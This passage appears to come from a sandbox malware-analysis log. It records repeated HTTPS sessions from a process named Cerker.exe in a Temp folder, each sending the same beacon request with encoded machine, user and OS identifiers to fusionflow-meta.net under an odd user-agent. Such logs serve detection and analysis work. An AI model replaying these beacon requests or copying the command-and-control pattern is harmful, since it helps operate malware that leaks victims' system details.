2024-08-31 20:43:33 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49921	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:34 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:35 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=884cuxhwJHKuS2%2FPUf0xwDFtbc5OXvVOhuRq914poadbi5ZdxtbQASt%2FHJfSMSfEBMQTjwK8vQHUwdZurxGa5MtIB7DV9vnESuvQs8S1IC7uVdvx%2BQK%2FDAzU1Ef%2Fn64wUcWQ7HuK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda85f9ef431b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:35 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49923	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:35 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:36 UTC	696	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6X%2Ft8cO5%2ByF%2BZ3l%2BqjbM1w%2FTkRn%2FYQjGjBwzOOQvQJavqLZP9bz1GRLgHEBUiUHnBon3c0QIl1mG9aDJPqXO%2B%2BmZ2WlhPqURjPprxYK95Be1L4oLayR3ZCAeUVtfPve7MSMzY8oK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda8d5a454362-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:36 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49926	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:37 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:37 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFy8z%2Fq1NzUVgKBB0cOSYXPcYkfH%2Bak6mgCIw2uEO4SqlqxELj8KwFuDXm%2Bnvq2eLAagwND7Vs%2BM%2B7JA32Pz4wkKWFwwcr5EK27Rq7qtgQANq1Nlzqeq%2Bm58mSnIsw5MN1B%2FjNAX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda950a0042c2-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:37 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49928	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:38 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:39 UTC	696	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ez%2BkhoPmIW5O%2BYfNsTuKXgGoElt7zqwgXgd4N9zBW4gWw9m6Djx16U2FPBe8MXcZZ4MH7i4fJ%2Fe8Wx2XgaX3IwuJfQq%2F%2Fjxn6qCn5xhzU%2FXjZ1gpLywom%2FUJA2KF%2B3EDn77WHL1K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda9d9e2319e3-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:39 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49931	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:39 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:40 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cdjEWz%2BGpgeFfsThZPMAvlt2DAw4qphzNighqvycoTLnOX55qxk6WDwmnvnB9IxM%2BPwOyUqr4SbY3gH1rUXP96sDxhfkJugA0%2FyXUvD3X%2BvnuvE7viJ2p7r5z7bL9Ck4lA%2FRxvhi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdaa5aabe4229-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:40 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49933	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:40 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:41 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSBl1fpo%2BpbNbBOWxqH45yWq1%2Bhdd6t9gu%2BGG9qUDy29wi31lihMGOypnstysD7ZwWbde8BRRJQNtE2HX8%2BIh%2BYaZpgcFVmzTqxsUEi8IQPlhQJ1Bir3OJe%2BlgGqFbs97ePP4eup"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdaac7b980f81-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:41 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49937	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:42 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:42 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JVlA8uY2CIfA94gZ2jOaZdcP9oeexqDCylBxkzqpk%2FTjpwLFi8bRtPMwztYbxx8tJu5RJLU9AKKgxlJv89TOLulTIrp0OcakGxdJAXNI17BJq73V5w8FDvWk1gd1SzlxDbcRbScQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdab52a164210-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:42 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49940	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:43 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:44 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyzLhcj7TllFVKTgenEjcDSK%2FUOUo4A8ZET%2BIYn0jbNZgCh%2FhudjrGMJjhvvhUWRfU8E3oTHAOWQAURWlS7rwGpDfdNbszbJeta3gYnEOZMld35rIqBRWAeLhDmBU3eW5d6jotxE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdabd7910431b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:44 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49942	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:44 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:45 UTC	704	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cEL0k%2BM5Z9rqz%2Bdn2Jm4Vp%2BpymBr%2BU6%2FRZ5nqcna1B0FJiiXpDk5Poaq%2FFCkdMn3kUU34pQhedqBqAhbGbVd6%2BSV7IVOG%2FA%2Ffsp%2BYiOZtzXRz%2FSHaeT12OxrZJHcR84uXqC%2FnORi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdac5aa890cb2-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:45 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49944	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:46 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:47 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78ukT4rdpw5r9EGKEIIe5%2B1F71DO%2FO87MWy0VIs9UcSwyT1%2BJfv3HowcV3YptFWHT%2BOEZNhdIIjefZAMUMlQYqzw5axXH5k0eCb1Is4AA%2BXMif0%2F0wRE3SQ%2BA6cQj8qfWhZYTblN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdacd481741d9-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:47 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49948	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:47 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:48 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLykTrYyW9rIxMT9%2FnkTvqKkCsebDa6HVobjtnny6NeRUBPOOdh4kCXt4cZ06AXgVsWwISCQap6G3t4Y3jj5759sGGRfRvGXjOrtReaZ43nh2iboAqfWKSYZkB6kyrF8Doo7XkD9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdad76f25c44d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:48 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49950	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:48 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:49 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nqWnUTgXkJ58gl9U69%2BhBtMd%2BGfqCBoVjSxlmcDAn%2FGaGWCuWxPYolq1Y10AvhOzMoypyo0W%2BH8AYyiSzGXHjyKznSUnGpW4K6CMa3tsq3cyiSU69z6jP3BY9R0oMhStf50q84Dk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdadf4eba0f3f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:49 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49953	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:50 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:50 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bGK3GcFT77VTMAJMSIG4cIY0QkCgD3T7muaxLDZR0omooGv7019XisB%2FqgOHL19l2FRvuQDgEqjMVTMAp7W%2FOhdqN9AiNRQY0htQpQ%2FtibwIxhlocCKetFmXCDWGUTct87xJi7Os"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdae7fa6878df-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:50 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49955	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:51 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:52 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bE%2B8Wefadg3EFPnAsOAeOdbge5pPDMG4HVcDVmMQoJZ9RgGWq3WWkAyl70rtSV2CK2Os6fwyfJxT4jjB%2BJrDMp62f5PjkvzfCYQS5%2B%2FADegLwGB3UJfzpo1qTLi7UQyqI2Iozvyt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdaef7b7e431b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:52 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49959	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:52 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:53 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FO5geMZwDV9fqNymWekKR5N1hdAmSpBEa8Ur09%2F%2BOnbVPKRN7OzuqxMCXv%2B9fbLtFn%2BK9g7rqiI%2Fi3kxeNuUhS17ZKGMjlIgA9IGvfiuabi4MZ2ZYntzjHzFgOcgmuUYsauu%2BV8C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdaf6eaa37c6c-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:53 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49961	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:53 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
